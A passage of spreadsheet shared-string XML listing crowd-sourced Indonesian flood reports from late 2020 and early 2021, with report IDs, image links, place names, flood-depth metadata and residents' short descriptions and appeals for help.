    <t>Pucangsawit</t>
  </si>
  <si>
    <t>Jebres</t>
  </si>
  <si>
    <t>Surakarta</t>
  </si>
  <si>
    <t>b4120a2b-0d7a-4c92-96f8-61488bdab09f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4120a2b-0d7a-4c92-96f8-61488bdab09f.jpg</t>
  </si>
  <si>
    <t>Kampung Jawa Baru</t>
  </si>
  <si>
    <t>Banda Sakti</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/cLLCAAxVj_ccV_W-eO7Z3PDHtpo863B7XZAm3STNkDctGVoSfo_9pdA8Iopqik-FdxjTFBLg3EhyFSG9VCeUKQXmBqq-0OHQfWTd9zTEIeY=s480-c</t>
  </si>
  <si>
    <t>dari rt 02 komplek griya inti sentosa rw 20</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/pqYO9xoDh3x82VQcF_bavoj0ZtRU1DSw8YgDHU7LQL2Nt6d3_IZoaU-u-IDVXejHdNH9YZxy6fIPLACGC837JDtnb0kSqR22G0R6BjlL=s480-c</t>
  </si>
  <si>
    <t>dari rt 02 .rw 20 jkt utara komplek griya inti sentosa got kecil air engak jln bantu di lebar kan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xYD1mpqIKEFTnQmdcBsl00qebW1fq7zT5z9cQwqpAJM-aW2DGBv23pQWiC5qMkd7ySNBYK04oLiLqBzi1rhlKccfr9L_-qwZDvobjYXh1Q=s480-c</t>
  </si>
  <si>
    <t>dari rt 02 got nya udah kecil kali engak jln bantu di lebar kan dari rw 20 jkt utara .sunter agung</t>
  </si>
  <si>
    <t>ecc2d344-ad18-4103-b7b1-03369fd9f9f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ecc2d344-ad18-4103-b7b1-03369fd9f9f8.jpg</t>
  </si>
  <si>
    <t>Jembatan rusak pasca banjir di desa SNB Meurwudu Aceh Timur, aktivitas warga terganggu,perlu perbaikan secepatnya Kondisi banjir sdh surut"</t>
  </si>
  <si>
    <t>Lancang Garam</t>
  </si>
  <si>
    <t>7103c842-8a1d-4573-b072-9b0bfe8620ff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7103c842-8a1d-4573-b072-9b0bfe8620ff.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 86, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Gladak Anyar</t>
  </si>
  <si>
    <t>Pamekasan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/356391</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/12/19/356391-16083510391501224794.mp4-03.jpg</t>
  </si>
  <si>
    <t>Hujan Sejak Pagi, Bawah Tol Layang Pettarani Tergenang Air</t>
  </si>
  <si>
    <t>Hujan yang mengguyur Kota Makassar sejak pagi menyebabkan beberapa ruas digenangi air. Seperti pemandangan di bawah Tol Layang Pettarani, Makassar ini.</t>
  </si>
  <si>
    <t>Sinri Jala</t>
  </si>
  <si>
    <t>Panakkukang</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/356393</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/12/19/16083687771156393708.jpg</t>
  </si>
  <si>
    <t>Ada Genangan Air, Lalin Jalan Perintis Kemerdekaan Macet</t>
  </si>
  <si>
    <t>Ruas Jalan Perintis Kemerdekaan Makassar, Sulawesi Selatan mengalami kemacetan. Kendaraan padat merayap memasuki kota Makassar atau menuju Kabupaten Maros. Sejumlah drainase tak dapat menampung debit hujan hingga beberapa titik tergenang atau banjir.</t>
  </si>
  <si>
    <t>5eb3130b-4d36-4ee4-8488-b8f1f7d7574c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5eb3130b-4d36-4ee4-8488-b8f1f7d7574c.jpg</t>
  </si>
  <si>
    <t>Bencana Banjir di Kecamatan Manggala Kelurahan Manggala blok 10. RT/RW. :04/11 Total KK. :41 kk Total Jiwa. :180 jiwa"</t>
  </si>
  <si>
    <t>Manggala</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/EC-4IaEnrOrR9kejljaWihVXlIH55t9PkN_X7EiWbo8hWqJTSjGjr8BIlTD5VbkDj16BxRECKCD8U6irfU5Ehv6h_fQNr457WHwCDLfa=s480-c</t>
  </si>
  <si>
    <t>coba anda lihat lumpur kali hampir sama dengan daratan bagaimana tidak terjadi banjir apabila tidak diangkat</t>
  </si>
  <si>
    <t>8b016dac-4520-4b69-a6a4-921394f4d5df</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b016dac-4520-4b69-a6a4-921394f4d5df.jpg</t>
  </si>
  <si>
    <t>Lokasi Genangan air berada di Komp. Bung Permai. yang menggenangi beberapa rumah. terima kasih"</t>
  </si>
  <si>
    <t>Tamalanrea Jaya</t>
  </si>
  <si>
    <t>478d4194-5985-4eb5-9f45-191433446c42</t>
  </si>
  <si>
    <t>Sarabau</t>
  </si>
  <si>
    <t>Plered</t>
  </si>
  <si>
    <t>2d2668c3-db88-4416-8d67-89dda8ef011a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2d2668c3-db88-4416-8d67-89dda8ef011a.jpg</t>
  </si>
  <si>
    <t>Banjir dari sekitar pukul 17. lokasi di jalan sukamulya kel sukagalih kec pasteur, kendaraan tidak bisa lewat dan ada kendaraan terbawa arus</t>
  </si>
  <si>
    <t>Sukagalih</t>
  </si>
  <si>
    <t>Sukajadi</t>
  </si>
  <si>
    <t>22a756db-77a3-4113-9c30-3cab0d8cf80d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/22a756db-77a3-4113-9c30-3cab0d8cf80d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 120 }</t>
  </si>
  <si>
    <t>via: @yoshisuba Banjir di Pasteur depan BTC"</t>
  </si>
  <si>
    <t>Pajajaran</t>
  </si>
  <si>
    <t>Cicendo</t>
  </si>
  <si>
    <t>185b232a-f871-4eb1-805c-bb90ccee08fe</t>
  </si>
  <si>
    <t>Banjir boss</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/a_IQmjJbyqF-0SRM8QrYfrqsL8xLIjQv39YFZoNvGry4GitLDxj0EiMx9jyVkYpn-pEX77fuGI2UwP1JIO7foIH37ThMbzMjQ9Z0HkupyA=s480-c</t>
  </si>
  <si>
    <t>genangan air , cukup ggu</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/5XRTTYkQ3F-VGpNPoHHW5MN76hN0NI1FRmmAx8bKJTXr153I64hmcls3NcIsTtWt4Q6hZgBfYVmX-QwAeUvkqXgRoUhwJEyL5Enf2TpXLCs=s480-c</t>
  </si>
  <si>
    <t>banjie - genangan air</t>
  </si>
  <si>
    <t>04fac033-251d-42ba-818a-1980d089e539</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04fac033-251d-42ba-818a-1980d089e539.jpg</t>
  </si>
  <si>
    <t>Banjir luapan kali lamong</t>
  </si>
  <si>
    <t>d7396fac-59d2-4ea4-aaef-8ef4a3dab67f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d7396fac-59d2-4ea4-aaef-8ef4a3dab67f.jpg</t>
  </si>
  <si>
    <t>ini bagian luar rumah, banjir kiriman masuk kedalam rumah, yang didalem rembesan dari saluran air tingginya diatas lutut ini banjir kiriman"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lfrr16H8zxKmuQdLIXKrbOISBfO3sqQK3i1fpdY_sUche4eW6GSdpcP6HTTmUho_ShhV3gNR0waia56pK3Y3GsaXfSm2NGrhkt-Qfdg7=s480-c</t>
  </si>
  <si>
    <t>saya warga gadukan timur depan SPBU hotel antariksa mau menyampaikan permasahan banjir setiap turun hujan... di karenakan air hujan dari jalan raya masuk ke kampung sehingga terjadi banjir .. klu bisa di buatkan gorong? supaya kampung warga gadukan timur</t>
  </si>
  <si>
    <t>72d482d8-a53c-414d-abc5-6f416f6683c8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72d482d8-a53c-414d-abc5-6f416f6683c8.jpg</t>
  </si>
  <si>
    <t>Mulai dari terminal wilangun arah ke surabaya sampai margomulyo dan di susul sampe pasar banyurip</t>
  </si>
  <si>
    <t>83d79ca0-8394-410c-880d-d8604f6df326</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83d79ca0-8394-410c-880d-d8604f6df326.jpg</t>
  </si>
  <si>
    <t>Banjir luapan sungai Lamong di Dusun Morowudi Kulon terjadi sejak 28 Desember 2020 pukul ?23.00 WIB</t>
  </si>
  <si>
    <t>Morowudi</t>
  </si>
  <si>
    <t>Cerme</t>
  </si>
  <si>
    <t>7af8b9b3-0031-49eb-8ea4-b20dace695be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7af8b9b3-0031-49eb-8ea4-b20dace695be.jpg</t>
  </si>
  <si>
    <t>Banjir akibat luapan sungai, mengakibatkan ratusan rumah terendam.</t>
  </si>
  <si>
    <t>94e7be3f-1121-4b08-85cf-ba5a57ddb627</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94e7be3f-1121-4b08-85cf-ba5a57ddb627.jpg</t>
  </si>
  <si>
    <t>saluran air tidak lancar, menyebabkan air di selokan meluap</t>
  </si>
  <si>
    <t>Kepuh Kiriman</t>
  </si>
  <si>
    <t>5c105b09-3cff-4fc0-bdba-67a74d279553</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-JA" }</t>
  </si>
  <si>
    <t>Sungai Bertam</t>
  </si>
  <si>
    <t>Jambi Luar Kota</t>
  </si>
  <si>
    <t>Muaro Jambi</t>
  </si>
  <si>
    <t>Jambi</t>
  </si>
  <si>
    <t>f73f24f4-0af2-4a67-8116-2191eb9c0b2d</t>
  </si>
  <si>
    <t>Ikerikergeger</t>
  </si>
  <si>
    <t>2caef74e-9b22-4bd7-a065-57b0ffdc9b59</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3823", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>perbaikan jalan dan gorong gorong</t>
  </si>
  <si>
    <t>Tambakaji</t>
  </si>
  <si>
    <t>d0d6cdc1-97de-4db3-99c0-91c4d7e45d80</t>
  </si>
  <si>
    <t>Banjir di desa tambak beras,kabupaten gresik, kecamatan cerme</t>
  </si>
  <si>
    <t>Tambakberas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/SczSt1EVXsCJksisK-bNeD1lwWgC6NcHFWCFc6YHROBZJ0dErjsitkupnvm-TEvi58RvDO8T5H8o2upaXAIz_yC0DTfruju1Eu6S34ce0w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "224", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di komplek unilever blok A, rt 05 rw 09.. disebabkan oleh oknum warga yang menyumbat aliran pembuangan dengan besi karung bantalguling dan triplek yang diberi sangga/dudukan penguat untuk keperluan menyiram tanaman di dekat sdn 04/pintu penghub"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vKkeUwfD2M8Lwbpo3rHUEFD3ZIyjWxGsqhlZX3mN2n7I7U3dP5Cs-rvodIKfQH0OewSeSrQxCRTChqPf4oRAEJugMM3ZpmckSRMNt-HV=s480-c</t>
  </si>
  <si>
    <t>banjir di rt05 rw09, disebabkan saluran air yang disumbat untuk keperluan menyiram tanaman. (lokasi sumbatan di gerbang penghubung antara jl. haji saaba terusan dengan perumahan taman villa meruya, didepan sdn04) ada 2 saluran yg disumbat dengan menggun"</t>
  </si>
  <si>
    <t>036855f0-478a-427d-b474-ab13bed92013</t>
  </si>
  <si>
    <t>Banjir di perumahan Mojoroto Indah dan sekitarnya sejak pukul 18.00</t>
  </si>
  <si>
    <t>Mojoroto</t>
  </si>
  <si>
    <t>6e115f28-1219-479a-aae3-56c0e4061cff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6e115f28-1219-479a-aae3-56c0e4061cff.jpg</t>
  </si>
  <si>
    <t>Griyo Mapan yang selalu BANJIR Dan selalu banyak anak kecil yang berenang didepan rumah Padahal itu kan air kotor"</t>
  </si>
  <si>
    <t>Tambak Sawah</t>
  </si>
  <si>
    <t>cb8459c5-447c-4e97-b6ff-67b57f864331</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cb8459c5-447c-4e97-b6ff-67b57f864331.jpg</t>
  </si>
  <si>
    <t>Banjir di jombang hampir satu minggu, kemarin sudah surut dan sekarang air nambah lagi</t>
  </si>
  <si>
    <t>Blimbing</t>
  </si>
  <si>
    <t>Kesamben</t>
  </si>
  <si>
    <t>5f7d428f-6567-4252-b103-49ae0db74ae3</t>
  </si>
  <si>
    <t>Area jalan wringinanom gresik</t>
  </si>
  <si>
    <t>Sumengko</t>
  </si>
  <si>
    <t>Wringinanom</t>
  </si>
  <si>
    <t>5d7ffadd-6b2c-4276-a82a-a31620f0b642</t>
  </si>
  <si>
    <t>BANJIR ARAH TAMBAK SAWAH DAN KOMPLEK INDUSTRI</t>
  </si>
  <si>
    <t>c28e2724-c625-4904-b43b-4d2ee3d9dfea</t>
  </si>
  <si>
    <t>Banjir di jalan letjen suprapto depan kepuh permai</t>
  </si>
  <si>
    <t>Tambak Rejo</t>
  </si>
  <si>
    <t>c066ba38-d615-477a-b302-ac8a87c55629</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c066ba38-d615-477a-b302-ac8a87c55629.jpg</t>
  </si>
  <si>
    <t>Banyakan</t>
  </si>
  <si>
    <t>dda34f9a-825c-45c8-b9bf-357f3a974960</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dda34f9a-825c-45c8-b9bf-357f3a974960.jpg</t>
  </si>
  <si>
    <t>Kwadungan</t>
  </si>
  <si>
    <t>Ngasem</t>
  </si>
  <si>
    <t>82605b1d-75e3-43a0-8da4-cb97793b3290</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82605b1d-75e3-43a0-8da4-cb97793b3290.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4155", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir, di RW 02, Rt o6, kelurahan wonosari, kec ngaLiyan, Kota Semarang..</t>
  </si>
  <si>
    <t>a5291ace-e815-499e-98b6-3524e588f4a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a5291ace-e815-499e-98b6-3524e588f4a9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-KR" }</t>
  </si>
  <si>
    <t>Mohon doa untuk keselamatan kami dan masyarakat sekitar Bintan timur, kepulauan Riau</t>
  </si>
  <si>
    <t>Kijang Kota</t>
  </si>
  <si>
    <t>Bintan Timur</t>
  </si>
  <si>
    <t>Bintan</t>
  </si>
  <si>
    <t>Kepulauan Riau</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/5m9EAkKFD2vg4ZgS2D-z2aDdoQMgCSbAzRrdKkj4-NZ_tJE1KwgypvvD_PDcJUsXIVkcpOHSapk5oRdNfYXzQuP84UsD41_x6mdp7xi-=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1813", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sirkulasi air tidak berjalan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8kLdmIBm9WDggA4yLV8a5mA71g7jFWEXe18iF3pj41IjkscRqJOz3ZqtCd85G3KGnUkf80SdNP_4DL8hBEzhwauAZowP4XsWZU1rbpscs7k=s480-c</t>
  </si>
  <si>
    <t>got tidak mengalir #BanjirKecil</t>
  </si>
  <si>
    <t>3918c14a-0b76-4298-8517-9a999b813064</t>
  </si>
  <si>
    <t>Nuhun accchhh</t>
  </si>
  <si>
    <t>Katapang</t>
  </si>
  <si>
    <t>1155598b-d9af-4644-a573-064f2c0ac827</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1155598b-d9af-4644-a573-064f2c0ac827.jpg</t>
  </si>
  <si>
    <t>125185cb-d846-479b-b4d8-6c6456f791cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/125185cb-d846-479b-b4d8-6c6456f791cc.jpg</t>
  </si>
  <si>
    <t>Banjir tahunan kerap terjadi dari jaman mama papa belum nikaj sampai saya umur 20 tahun, pemerintah hanya janji janji belaka</t>
  </si>
  <si>
    <t>Pucangro</t>
  </si>
  <si>
    <t>Kalitengah</t>
  </si>
  <si>
    <t>Lamongan</t>
  </si>
  <si>
    <t>e2bf178c-4406-4f00-815d-e7111ffd05f0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e2bf178c-4406-4f00-815d-e7111ffd05f0.jpg</t>
  </si>
  <si>
    <t>Akibat hujan didaerah utara pamekasan, banjir kiriman terjadi di kecamatan kota Pamekasan. Ditambah lagi pasang air laut terjadi malam</t>
  </si>
  <si>
    <t>Barurambat Kota</t>
  </si>
  <si>
    <t>4e5c25be-eade-49a4-b5da-43aef40dd351</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4e5c25be-eade-49a4-b5da-43aef40dd351.jpg</t>
  </si>
  <si>
    <t>Banjir di wilayah Bati-Bati, Tanah Laut Kalimantan Selatan</t>
  </si>
  <si>
    <t>Benua Raya</t>
  </si>
  <si>
    <t>Bati - Bati</t>
  </si>
  <si>
    <t>444be5b0-d841-4776-a8b4-7ca433d090d7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/444be5b0-d841-4776-a8b4-7ca433d090d7.jpg</t>
  </si>
  <si>
    <t>Banjir kel. Jombok kesamben jombang sudah 11 hari tidak surut</t>
  </si>
  <si>
    <t>Tempuran</t>
  </si>
  <si>
    <t>Sooko</t>
  </si>
  <si>
    <t>Mojokerto</t>
  </si>
  <si>
    <t>f8aa6817-2508-4c1e-8fd2-e057592e36fd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f8aa6817-2508-4c1e-8fd2-e057592e36fd.jpg</t>
  </si>
  <si>
    <t>Banjir di kelurahan jombok kec. Kesamben. Kab Jombang telah 11 hari belum surut</t>
  </si>
  <si>
    <t>Jombok</t>
  </si>
  <si>
    <t>3a29c633-44d7-4d70-abf9-1987327000ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3a29c633-44d7-4d70-abf9-1987327000ca.jpg</t>
  </si>
  <si>
    <t>Nagari Selayo, Kecamatan IX Korong, Kecamatan Koto Panjang terjadi banjir.</t>
  </si>
  <si>
    <t>Sinapa Piliang</t>
  </si>
  <si>
    <t>Lubuk Sikarah</t>
  </si>
  <si>
    <t>Solok</t>
  </si>
  <si>
    <t>b6d9c663-f6da-4a9f-86e0-4bfd8eb6cd95</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b6d9c663-f6da-4a9f-86e0-4bfd8eb6cd95.jpg</t>
  </si>
  <si>
    <t>Banjir di jln cicalengka majalaya</t>
  </si>
  <si>
    <t>Sindangpakuon</t>
  </si>
  <si>
    <t>a7719e0a-abe5-4e3f-b025-ac838de209c5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7719e0a-abe5-4e3f-b025-ac838de209c5.jpg</t>
  </si>
  <si>
    <t>Tlogowaru</t>
  </si>
  <si>
    <t>b9fdea77-ac3a-409e-890d-0a6999c106e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b9fdea77-ac3a-409e-890d-0a6999c106e8.jpg</t>
  </si>
  <si>
    <t>Foto pada hari selasa pagi 12/1/2021 dan sampai selasa  malam debit air terus meningkat</t>
  </si>
  <si>
    <t>Pasar Jati</t>
  </si>
  <si>
    <t>Astambul</t>
  </si>
  <si>
    <t>Banjar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ihuWowV8IB-dnIcyeKuzcnCh752q8xqQAcM1Tcda_NnNs6_SQOmT0g5cYqUwYylqghwmecvRHc6LFILrm2wHbBPcsFxuHU5V__XMfasGJw=s480-c</t>
  </si>
  <si>
    <t>saluran mampet tidak jalan di kepa duri mas blok RR #KaliMeluap #kalimampet</t>
  </si>
  <si>
    <t>7d46f4a7-13e0-405b-b1b6-fcd783ec3ec0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7d46f4a7-13e0-405b-b1b6-fcd783ec3ec0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 166 }</t>
  </si>
  <si>
    <t>Pengaron, kab. banjar, provinsi kalsel dilanda banjir luar biasa sdh bbrpa hari belakangan, penduduk mogok kerja, bahkan jalan mati total</t>
  </si>
  <si>
    <t>Sungai Sipai</t>
  </si>
  <si>
    <t>Martapura</t>
  </si>
  <si>
    <t>8c8d4c0f-f5ea-484c-8dc6-64135c4cb7ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c8d4c0f-f5ea-484c-8dc6-64135c4cb7ca.jpg</t>
  </si>
  <si>
    <t>Banjir yang sudah menjadi langganan tiap tahunnya</t>
  </si>
  <si>
    <t>Putatkumpul</t>
  </si>
  <si>
    <t>Turi</t>
  </si>
  <si>
    <t>39e1ab3d-82c7-4afa-98b1-e9cd743562eb</t>
  </si>
  <si>
    <t>untuk air masih belum surut dikarenakan curah hujan yang meningkat setiap harinya</t>
  </si>
  <si>
    <t>Cindai Alus</t>
  </si>
  <si>
    <t>8ca2c103-1c37-4f0f-9663-8e46f06e8de2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8ca2c103-1c37-4f0f-9663-8e46f06e8de2.jpg</t>
  </si>
  <si>
    <t>Sei Jang</t>
  </si>
  <si>
    <t>Bukit Bestari</t>
  </si>
  <si>
    <t>Tanjungpinang</t>
  </si>
  <si>
    <t>21f0b063-abe0-49c1-b707-b4a0b06b90a5</t>
  </si>
  <si>
    <t>354805f0-1f7a-4370-8831-434b2739431c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/354805f0-1f7a-4370-8831-434b2739431c.jpg</t>
  </si>
  <si>
    <t>Landasan Ulin Timur</t>
  </si>
  <si>
    <t>Landasan Ulin</t>
  </si>
  <si>
    <t>Banjar Baru</t>
  </si>
  <si>
    <t>cf9f5a3b-e63e-41c6-b29c-1e6e17d8852a</t>
  </si>
  <si>
    <t>Disepanjang jalan masuk banjir</t>
  </si>
  <si>
    <t>Surgi Mufti</t>
  </si>
  <si>
    <t>Banjarmasin Utara</t>
  </si>
  <si>
    <t>ce764aa5-f2ed-4b34-b114-a628db73d140</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ce764aa5-f2ed-4b34-b114-a628db73d140.jpg</t>
  </si>
  <si>
    <t>Sudah mencapai lantai kamar.</t>
  </si>
  <si>
    <t>Belitung Selatan</t>
  </si>
  <si>
    <t>Banjarmasin Barat</t>
  </si>
  <si>
    <t>b43d7f7a-ede5-40e7-8d67-8ae07d41a2e2</t>
  </si>
  <si>
    <t>Telah terjadi banjir di wilayah martapura dan sekitarnya. Akibat dari banjir ini banyak rumah yg tenggelam</t>
  </si>
  <si>
    <t>Pingaran Ilir</t>
  </si>
  <si>
    <t>1e8875b5-f9d9-4c92-87a2-cd1630577b69</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e8875b5-f9d9-4c92-87a2-cd1630577b69.jpg</t>
  </si>
  <si>
    <t>Banjirnya sudah masuk rumah</t>
  </si>
  <si>
    <t>Karang Mekar</t>
  </si>
  <si>
    <t>Banjarmasin Timur</t>
  </si>
  <si>
    <t>47223a32-f56e-475f-98d3-b165c858d7d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/47223a32-f56e-475f-98d3-b165c858d7d9.jpg</t>
  </si>
  <si>
    <t>Banjir sudah hampir mencapai atap rumah, Kalsel darurat bencana banjir.</t>
  </si>
  <si>
    <t>Sungai Langsat</t>
  </si>
  <si>
    <t>Simpang Empat</t>
  </si>
  <si>
    <t>6f3c8c97-4236-4c90-a2ef-d555915f9305</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f3c8c97-4236-4c90-a2ef-d555915f9305.jpg</t>
  </si>
  <si>
    <t>Banjir terparah di banjarmasin</t>
  </si>
  <si>
    <t>Pemurus Dalam</t>
  </si>
  <si>
    <t>9e58f047-ad67-4549-a20c-fbb1827ddd6f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9e58f047-ad67-4549-a20c-fbb1827ddd6f.jpg</t>
  </si>
  <si>
    <t>Sejak tadi malam hujan tidak berhenti, air terus naik dengan cepat dan hampir masuk ke dalam rumah</t>
  </si>
  <si>
    <t>Sungai Lulut</t>
  </si>
  <si>
    <t>Sungai Tabuk</t>
  </si>
  <si>
    <t>ff87c16a-95c6-4c02-8741-f5c1ac8a4834</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff87c16a-95c6-4c02-8741-f5c1ac8a4834.jpg</t>
  </si>
  <si>
    <t>Banjir sudah 1 minggu</t>
  </si>
  <si>
    <t>b206d34f-0984-4c07-8850-50a3454d5c5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b206d34f-0984-4c07-8850-50a3454d5c5a.jpg</t>
  </si>
  <si>
    <t>Mohon bantuannya daerah barabai darat kabupaten hulu sungai tengah kalimantan selatan</t>
  </si>
  <si>
    <t>Barabai Darat</t>
  </si>
  <si>
    <t>Barabai</t>
  </si>
  <si>
    <t>Hulu Sungai Tengah</t>
  </si>
  <si>
    <t>67a68d0e-030d-4363-850e-d44f96d6cbab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/67a68d0e-030d-4363-850e-d44f96d6cbab.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 123, "report_type": "flood" }</t>
  </si>
  <si>
    <t>TOLONG BANTUAN PEMERINTAH HST</t>
  </si>
  <si>
    <t>Barabai Selatan</t>
  </si>
  <si>
    <t>c1eb109c-a91f-452f-93b3-d05a27e99ba7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c1eb109c-a91f-452f-93b3-d05a27e99ba7.jpg</t>
  </si>
  <si>
    <t>Banjir masuk ke rumah</t>
  </si>
  <si>
    <t>Teluk Dalam</t>
  </si>
  <si>
    <t>Banjarmasin Tengah</t>
  </si>
  <si>
    <t>a657898f-7f06-4bc7-acc6-3ec068ce0ff9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a657898f-7f06-4bc7-acc6-3ec068ce0ff9.jpg</t>
  </si>
  <si>
    <t>Banjir rob setiap pagi</t>
  </si>
  <si>
    <t>Eretan Kulon</t>
  </si>
  <si>
    <t>Kandanghaur</t>
  </si>
  <si>
    <t>4d854f93-55ae-445b-bead-800b028276b0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d854f93-55ae-445b-bead-800b028276b0.jpg</t>
  </si>
  <si>
    <t>#PrayForKalimantanSelatan Mohon bantuan secepatnya???? Kami memerlukan makanan siap saji selimut perlengkapan bayi untuk korban bencana ba"</t>
  </si>
  <si>
    <t>Harakit</t>
  </si>
  <si>
    <t>Piani</t>
  </si>
  <si>
    <t>Tapin</t>
  </si>
  <si>
    <t>2dbce462-0c84-4c3c-b923-d96e63456817</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2dbce462-0c84-4c3c-b923-d96e63456817.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 106, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di beberapa kabupaten dan kota di Kalimantan Selatan. Perlu bantuan segera dari pemerintah dan relawan untuk penanganan lebih lanjut.</t>
  </si>
  <si>
    <t>360059ef-cb7b-4228-b636-aa5a7593e13c</t>
  </si>
  <si>
    <t>Banjir di Sebagian besar wilayah Kalimantan Selatan</t>
  </si>
  <si>
    <t>7c863a54-8642-4d9c-8b6c-884b4ec30c13</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c863a54-8642-4d9c-8b6c-884b4ec30c13.jpg</t>
  </si>
  <si>
    <t>Jalanan lumpuh, rumah-rumah terendam makanan susah</t>
  </si>
  <si>
    <t>Handil Bakti</t>
  </si>
  <si>
    <t>Alalak</t>
  </si>
  <si>
    <t>Barito Kuala</t>
  </si>
  <si>
    <t>7558a218-eca3-4f21-a876-5d6575f449e5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7558a218-eca3-4f21-a876-5d6575f449e5.jpg</t>
  </si>
  <si>
    <t>Banjir didalam rumah hingga pinggang orang dewasa dan diluar rumah mencapai paha orang dewasa disekitaran jl A.Yani</t>
  </si>
  <si>
    <t>Astambul Seberang</t>
  </si>
  <si>
    <t>75571d5e-e355-493c-b513-298dd379c5b3</t>
  </si>
  <si>
    <t>Banjir melanda hampir 30% di wilayah kalimantan selatan</t>
  </si>
  <si>
    <t>Kelayan Timur</t>
  </si>
  <si>
    <t>b20d98de-2820-493f-851e-1dae40d592d8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b20d98de-2820-493f-851e-1dae40d592d8.jpg</t>
  </si>
  <si>
    <t>Bajir Terjadi Hari Ini Kamis 14 Januari 2021, Lokasi Desa Wonoasri Kec Tempurejo Kab Jember Jawa Timur coorinat :-8.389655, 113.679328</t>
  </si>
  <si>
    <t>Wonoasri</t>
  </si>
  <si>
    <t>Tempurejo</t>
  </si>
  <si>
    <t>d33e4638-e1f3-4a60-be66-50727eb5a5cf</t>
  </si>
  <si>
    <t>Banjir Kalimantan</t>
  </si>
  <si>
    <t>Bawahan Selan</t>
  </si>
  <si>
    <t>Mataraman</t>
  </si>
  <si>
    <t>7bb016ff-b277-4520-985e-506b6c540ae6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7bb016ff-b277-4520-985e-506b6c540ae6.jpg</t>
  </si>
  <si>
    <t>Air meluap sampai ke jalan raya dari pabahanan arah pelaihari dan sebaliknya</t>
  </si>
  <si>
    <t>Pabahanan</t>
  </si>
  <si>
    <t>dbc4dd14-22fd-4e3c-a084-07a1a50d867b</t>
  </si>
  <si>
